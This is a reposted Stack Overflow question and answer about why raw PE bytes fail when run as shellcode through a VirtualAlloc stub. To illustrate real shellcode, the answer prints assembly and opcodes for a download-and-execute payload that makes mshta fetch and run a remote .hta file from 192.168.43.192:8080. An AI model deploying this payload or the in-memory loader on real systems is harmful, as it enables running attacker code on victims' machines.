[SOLVED] Run raw shellcode inside c, compiled to exe

Issue

This Content is from Stack Overflow. Question asked by learningaspiring918

What i have tried:

  1. I opened the Opera-Setup installer .exe with HXD and exported it to c-sourcecode
  2. I put the shellcode of the output inside a main function to execute like following:
#include <Windows.h>



int main()
{

    unsigned char rawData[1804192] = {
    0x4D, 0x5A, 0x50, ...
    };

    void *exec = VirtualAlloc(0, sizeof(rawData), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, rawData, sizeof(rawData));
    ((void(*)())exec)();

}
  1. Then i compile this c file to an exe.
    But when i then execute it it just opens up a console shortly, but nothing happens afterwards.

The goal im trying to reach is that the opera-setup would be running successfully after this process. What am i doing wrong?



Solution

The error is that you’re refering to a PE executable as a shellcode, for example, this is an actual download and execute mshta shellcode

xor eax, eax              ;clear eax,get msvcrt.dll               
mov ax, 0x7472             ;"tr\0\0"               
push eax
push dword 0x6376736d      ;cvsm        
push esp

mov ebx,0x77e3395c         ;call LoadLibraryA
call ebx
mov ebp,eax         ;msvcrt.dll is saved in ebp

;mshta.exe http://192.168.43.192:8080/9MKWaRO.hta
xor eax,eax
PUSH eax
PUSH 0x6174682e         ;".hta"
PUSH 0x4f526157     ;"WaRO"
PUSH 0x4b4d392f     ;"/9MK"
PUSH 0x38303830     ;"8080"
PUSH 0x3a323931     ;"192:"
PUSH 0x2e33342e     ;".43."
PUSH 0x3836312e     ;".168"
PUSH 0x3239312f     ;"/192"
PUSH 0x2f3a7074     ;"tp:/"
PUSH 0x74682065     ;"e ht"
PUSH 0x78652e61     ;"a.ex"
PUSH 0x7468736d     ;"msht"

MOV EDI,ESP          ;adding a pointer to the stack                  
PUSH EDI

Mov eax,0x6ffab16f      ;call System    
call eax

xor eax, eax
push eax
mov eax, 0x77e3214f         ;call ExitProcess
call eax

Whose resulting object after assembling would be the actual shellcode, (in this case, represented in opcodes) :

char code[] = "\x31\xc0\x66\xb8\x72\x74\x50\x68\x6d\x73\x76\x63\x54\xbb\x5c\x39\xe3\x77\xff\xd3\x89\xc5\x31\xc0\x50\x68\x2e\x68\x74\x61\x68\x57\x61\x52\x4f\x68\x2f\x39\x4d\x4b\x68\x30\x38\x30\x38\x68\x31\x39\x32\x3a\x68\x2e\x34\x33\x2e\x68\x2e\x31\x36\x38\x68\x2f\x31\x39\x32\x68\x74\x70\x3a\x2f\x68\x65\x20\x68\x74\x68\x61\x2e\x65\x78\x68\x6d\x73\x68\x74\x89\xe7\x57\xb8\x6f\xb1\xfa\x6f\xff\xd0\x31\xc0\x50\xb8\x4f\x21\xe3\x77\xff\xd0";

When you’re trying to pass directly the bytes of a PE file (Opera-setup.exe), and setting a function pointer to the offset 0, you’re pointing to DOS header, which does not contain any valid instruction opcode, what you need to do is to parse the PE file, resolve the relocations relative to the parent file, and calculate what would be the entrypoint address in the PE file (Opera-setup.exe), normally the address to the start of the .text section.


 This Question was asked in  StackOverflow by  learningaspiring918 and Answered by Leonyya It is licensed under the terms of 
CC BY-SA 2.5. - CC BY-SA 3.0. - CC BY-SA 4.0.
people found this article helpful. What about you?